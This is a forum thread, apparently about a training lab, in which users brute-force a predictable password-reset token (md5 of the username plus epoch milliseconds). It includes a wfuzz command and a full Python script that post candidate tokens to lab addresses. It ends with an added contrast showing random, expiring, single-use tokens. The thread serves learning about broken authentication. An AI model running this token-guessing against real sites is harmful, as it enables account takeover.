nvm
if anyone else is stuck on this:
I used this https://www.epochconverter.com/ to get the epoch time in milliseconds, 2 seconds before and after the time it says the token was created.
I created a token list with the modified reset token_time.py and used wfuzz to find the correct token (I stole the command and modified script off some other posts):
wfuzz -c -w tokens.list --hs "Wrong token" -d "token=FUZZ&submit=check" http://83.136.252.32:46793/question1/
if you need help ask.
Hey @Neurosploit
I am trying your method and still unable to find the flag for some reason.
Would you mind telling me more about your script and how it operates?
Thank You
–new_user_001
you gotta change the start and end time to 2 seconds before and after the time that your token was generated.
I used this site to get the time:
https://www.epochconverter.com/ be sure to use the Timestamp in milliseconds
The script basically just makes requests to the specified url and adds htbadmin + the epoch in milliseconds and md5 hashes it to try to find the admin token. The admin token is htbadmin and the time in epoch milliseconds md5 hashed. The tricky part is you don’t know when the token was created, which is why we do 2 seconds before and after the time that htbuser token was generated.
did you change the url to your url and the time to yours?
if you read the hint it says Convert the displayed date to epoch time in milliseconds and use it in the script you will create. so convert the time you got to epoch time in milliseconds. Don’t forget 2 seconds before and after your time and then place that time in the script…
Thank You for your response and guidance, I updated my code accordingly, and it’s currently running as I am writing this.
Below is the code I am using for reference, not sure if there is any error but it’s not showing any error for now.
```python
from hashlib import md5
from sys import exit

import requests

url = "http://94.237.49.212:47517/question1/"
now = 1717064740000         # displayed token creation time, epoch milliseconds
start_time = 1717064738000  # -2 seconds
end_time = 1717064742000    # +2 seconds
fail_text = "Wrong token"
username = "htbadmin"

for x in range(start_time, end_time + 1):
    timestamp = str(x)
    # Candidate token: md5 of the username followed by the epoch milliseconds
    md5_token = md5((username + timestamp).encode()).hexdigest()
    data = {
        "submit": "check",
        "token": md5_token
    }
    print("checking {} {}".format(str(x), md5_token))
    res = requests.post(url, data=data)
    # Any reply without the failure text means the token was accepted
    if fail_text not in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()
```
Kind Regards
–new_user_001
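An added example, not part of any post in this thread: the token scheme the posts describe (md5 of the username plus epoch milliseconds) next to a hardened form that does not depend on the creation time. `ResetTokenStore`, `TOKEN_TTL_SECONDS` and the 15-minute lifetime are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60  # assumed lifetime of a reset token


def weak_token(username: str, epoch_ms: int) -> str:
    """Scheme from the thread: fully determined by username and creation time."""
    return hashlib.md5(f"{username}{epoch_ms}".encode()).hexdigest()


def weak_candidates(window_s: int) -> int:
    """Distinct tokens possible when creation time is known to +/- window_s."""
    return 2 * window_s * 1000 + 1


class ResetTokenStore:
    """Hypothetical server-side store: random, expiring, single-use tokens."""

    def __init__(self):
        self._pending = {}  # username -> (sha256 hex of token, expiry time)

    def issue(self, username, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        digest = hashlib.sha256(token.encode()).hexdigest()
        # Only the digest is stored; issuing again replaces the old token.
        self._pending[username] = (digest, now + TOKEN_TTL_SECONDS)
        return token

    def redeem(self, username, token, now=None):
        now = time.time() if now is None else now
        entry = self._pending.get(username)
        if entry is None:
            return False
        digest, expiry = entry
        candidate = hashlib.sha256(token.encode()).hexdigest()
        # Constant-time comparison, then the expiry check.
        ok = hmac.compare_digest(digest, candidate) and now <= expiry
        if ok:
            del self._pending[username]  # single use
        return ok
```

With a 2-second window the weak scheme leaves 4001 possible tokens, while the random token carries 256 bits that no timestamp reveals. Limiting attempts on the token check endpoint is a separate control not shown here.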